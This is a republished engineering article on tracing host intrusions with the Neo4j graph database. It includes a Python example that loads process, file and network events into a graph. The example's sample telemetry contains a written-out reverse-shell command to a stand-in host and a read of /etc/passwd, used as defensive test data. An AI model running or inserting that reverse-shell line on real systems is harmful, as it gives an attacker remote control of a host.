How Graph Databases Revolutionize Host Security Incident Response

This article describes how HuoLala's in-house HIDS (host intrusion detection system) uses the Neo4j graph database and the Neovis.js visualization library to bring process, network and file data into a single graph, so that attack chains can be reconstructed quickly, incidents across several clouds handled efficiently, and day-to-day security operations improved.

Huolala Tech

Exploration Background

As HuoLala expanded across multiple clouds, incident responders had to switch between cloud consoles and work with opaque vendor security policies that could not be customized. To cut the operating cost of multi‑cloud response and let host‑level data interoperate with other in‑house security products, the team built its own HIDS. Beyond detection, it explored mechanisms for tracing attack chains, with the goal of full visibility into an intrusion and a lower MTTR.

1.1 Emergency Tracing Pain Points

Host security data (process creation, file activity, network connections, login logs) was spread across MySQL, Elasticsearch and Hive. Detection produced single‑point alerts; understanding an incident meant manually correlating logs across dimensions, switching between Kibana dashboards for process, network, DNS, file and login data. That manual work took minutes to hours and was error‑prone, and the large cross‑store joins needed to automate it were impractical on those databases, which ruled out real‑time response.

1.2 Emergency Response Requirements

Quickly assess whether an alert indicates a real attack.

Reconstruct the attacker’s intrusion chain to pinpoint cause and decide on remediation.

Evaluate impact and discover additional unknown threats through correlation.

To meet these needs, all host‑level data (processes, network, files) is stored uniformly in a graph database, which models relationships natively and lets a single traversal answer questions that would otherwise require joins across several stores.

2 Graph Database Research

The open‑source graph databases evaluated were Neo4j, JanusGraph, HugeGraph and NebulaGraph. Neo4j was chosen because it could be put into use quickly and because of its visualization tooling.

2.1 Neo4j Overview

Neo4j is a high‑performance NoSQL graph database that stores data as nodes and relationships. Nodes have labels and properties; relationships are directed, typed, and can also hold properties.

2.2 Visualization with Neovis.js

Neovis.js is a JavaScript library that connects to Neo4j and renders interactive graph visualizations. It allows custom UI design, URL‑based trace links, easy integration with existing tools, and iterative feedback‑driven development.

2.3 Cypher Query Language

Cypher is Neo4j's declarative query language. The basic clauses are MATCH for pattern matching, WHERE for filtering and RETURN for results. The trace query used in this system looks like this:

MATCH (n)-[r*]-(m) WHERE n.pid='1788' AND n.ip='10.xx.xx.16' RETURN n, r, m

Two points a practitioner should note. The pattern is filtered on both pid and host IP because pids are recycled and repeat across hosts, so pid alone does not identify a process. And the variable‑length pattern here is undirected and has no upper bound, so it returns every path in the connected component around n; that is fine for a small alert sub‑graph but on a larger graph the hop count should be bounded and, where possible, a direction given.

3 Graph Database Application

3.1 Data Processing Flow

Security alerts are enriched with the related host‑level data (process, network, file) and written into Neo4j. Because the graph holds alert context rather than the full raw event stream, the data volume stays manageable.

3.2 Data Modeling

Node types: host, warning, process, file, network. Relationship types: create, trigger, external‑connect, open, and so on. Example relationships:

process‑[create]‑>process (parent‑child)

process‑[open]‑>file

process‑[external‑connect]‑>network

process‑[trigger]‑>warning

3.3 Process Chain Parent‑Child Relationships

On Linux, the threads of one process share a TGID; the processes in one process group share a PGID; a session (SID) groups several process groups, typically everything started from one login. By correlating pid, ppid, pgid and sid from process‑creation events, the system reconstructs the parent‑child hierarchy and renders it as a directed graph.
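The following is an added example, not HuoLala's code, that ties sections 3.2 and 3.3 together: it takes raw host events, builds the node/relationship model described above, emits the parameterised Neo4j MERGE statements that would load it, and walks the process chain from an alerting process back to its root. The event field names, the (host, pid) node identity, the uppercase relationship names, the RUNS edge from host to process and the sample telemetry are all assumptions. It also produces a bounded, parameterised form of the daily trace query from section 4.2.

```python
"""Build the alert graph of sections 3.2/3.3 from raw host events, emit the
Neo4j MERGE statements that would load it, and walk a process chain back to
its root. Added example, not HuoLala's code: event field names, the (host, pid)
node identity, the uppercase relationship names and the RUNS edge are assumed."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

Key = Tuple[str, ...]          # (label, identifying fields...)

# Constructed sample telemetry (not real data): a PHP worker is command-injected
# into spawning a shell, which opens a reverse shell and reads /etc/passwd.
EVENTS = [
    {"type": "process", "host": "10.0.0.16", "pid": 1200, "ppid": 1, "pgid": 1200, "sid": 1200, "cmd": "php-fpm: master process"},
    {"type": "process", "host": "10.0.0.16", "pid": 1500, "ppid": 1200, "pgid": 1500, "sid": 1200, "cmd": "php-fpm: pool www"},
    {"type": "process", "host": "10.0.0.16", "pid": 1788, "ppid": 1500, "pgid": 1788, "sid": 1200,
     "cmd": "sh -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'"},
    {"type": "process", "host": "10.0.0.16", "pid": 1789, "ppid": 1788, "pgid": 1788, "sid": 1200, "cmd": "bash -i"},
    {"type": "network", "host": "10.0.0.16", "pid": 1789, "dst": "203.0.113.7", "dport": 4444},
    {"type": "file", "host": "10.0.0.16", "pid": 1789, "path": "/etc/passwd"},
    {"type": "warning", "host": "10.0.0.16", "pid": 1788, "rule": "reverse_shell"},
]


@dataclass
class Graph:
    nodes: Dict[Key, Dict] = field(default_factory=dict)      # key -> {"label", "props"}
    edges: List[Tuple[Key, str, Key]] = field(default_factory=list)

    def add_node(self, key: Key, **props) -> Key:
        # key[0] is the label. A node may first appear as a bare placeholder
        # (a parent known only via ppid) and is filled in when its own event arrives.
        self.nodes.setdefault(key, {"label": key[0], "props": {}})["props"].update(props)
        return key

    def add_edge(self, src: Key, rel: str, dst: Key) -> None:
        if (src, rel, dst) not in self.edges:
            self.edges.append((src, rel, dst))


def proc_key(host: str, pid: int) -> Key:
    # pids are recycled and repeat across hosts, so (host, pid) is the identity.
    return ("process", host, str(pid))


def build_graph(events: List[Dict]) -> Graph:
    g = Graph()
    for e in events:
        host = g.add_node(("host", e["host"]), ip=e["host"])
        if e["type"] == "process":
            p = g.add_node(proc_key(e["host"], e["pid"]), pid=e["pid"], ppid=e["ppid"],
                           pgid=e["pgid"], sid=e["sid"], cmd=e["cmd"], ip=e["host"])
            g.add_edge(host, "RUNS", p)                     # assumed host -> process edge
            g.add_edge(g.add_node(proc_key(e["host"], e["ppid"]), pid=e["ppid"]), "CREATE", p)
        elif e["type"] == "network":
            n = g.add_node(("network", e["dst"], str(e["dport"])), dst=e["dst"], dport=e["dport"])
            g.add_edge(proc_key(e["host"], e["pid"]), "CONNECT", n)
        elif e["type"] == "file":
            f = g.add_node(("file", e["host"], e["path"]), path=e["path"])
            g.add_edge(proc_key(e["host"], e["pid"]), "OPEN", f)
        elif e["type"] == "warning":
            w = g.add_node(("warning", e["host"], str(e["pid"]), e["rule"]), rule=e["rule"])
            g.add_edge(proc_key(e["host"], e["pid"]), "TRIGGER", w)
    return g


def to_cypher(g: Graph) -> List[Tuple[str, Dict]]:
    """Parameterised MERGE statements, one (query, params) pair per node and edge.
    Command lines carry quotes and shell metacharacters, so they travel in $props
    and are never spliced into the query text."""
    stmts = [(f"MERGE (n:{n['label']} {{key: $key}}) SET n += $props",
              {"key": "|".join(k), "props": n["props"]}) for k, n in g.nodes.items()]
    for src, rel, dst in g.edges:
        stmts.append((f"MERGE (a:{src[0]} {{key: $a}}) MERGE (b:{dst[0]} {{key: $b}}) "
                      f"MERGE (a)-[:{rel}]->(b)", {"a": "|".join(src), "b": "|".join(dst)}))
    return stmts


def process_chain(g: Graph, host: str, pid: int, max_depth: int = 64) -> List[str]:
    """Follow CREATE edges from (host, pid) up to the root; command lines root-first.
    Bounded by depth and a visited set so a bogus ppid loop cannot spin forever."""
    parent_of = {dst: src for src, rel, dst in g.edges if rel == "CREATE"}
    chain, seen, cur = [], set(), proc_key(host, pid)
    while cur in g.nodes and cur not in seen and len(chain) < max_depth:
        seen.add(cur)
        chain.append(g.nodes[cur]["props"].get("cmd", f"pid {cur[2]} (no exec event)"))
        cur = parent_of.get(cur)
    return chain[::-1]


def session_members(g: Graph, host: str, sid: int) -> List[int]:
    """All pids on a host sharing one session id, i.e. everything from one login."""
    return sorted(n["props"]["pid"] for k, n in g.nodes.items()
                  if k[0] == "process" and k[1] == host and n["props"].get("sid") == sid)


def trace_query(max_hops: int = 6) -> str:
    """Bounded, parameterised form of the article's daily trace query (section 4.2)."""
    return f"MATCH p = (n:process {{ip: $ip, pid: $pid}})-[*1..{max_hops}]-(m) RETURN p"


if __name__ == "__main__":
    g = build_graph(EVENTS)
    print(" -> ".join(process_chain(g, "10.0.0.16", 1788)))
    print("session 1200:", session_members(g, "10.0.0.16", 1200))
    for stmt, params in to_cypher(g)[:3]:
        print(stmt, params)
```

Run as-is it prints the reconstructed chain from init through php-fpm to the injected shell, the pids sharing the login session, and the first few load statements. The statements are meant for the official neo4j Python driver (session.run(query, **params)); keeping every property in parameters matters because attacker-controlled command lines are exactly the kind of value that breaks, or is abused through, string-built queries.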

4 Host Security Effects

4.1 Push Graph Data Trace Chains

Security alerts are sent to Feishu groups via a bot, with URLs linking to the Neo4j visualization of the trace chain. Sample alerts (command injection, reverse shell) include detailed process information and trace‑chain URLs.

4.2 Daily Graph Queries

Operators query a node by pid and host IP with Cypher and get back the full sub‑graph of related activity.

4.3 Visualization Features

Hover to view node details; mouse wheel to zoom.

Drag nodes with inertia; “Stabilize” button to fix layout.

5 Summary and Outlook

The security team's graph‑database practice has shown clear gains in incident‑response efficiency during drills. Future work includes extending graph‑based tracing to the EDR, defense‑in‑depth and data‑security products, aiming at a layered, comprehensive security view from high‑level attack paths down to process‑level alerts.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
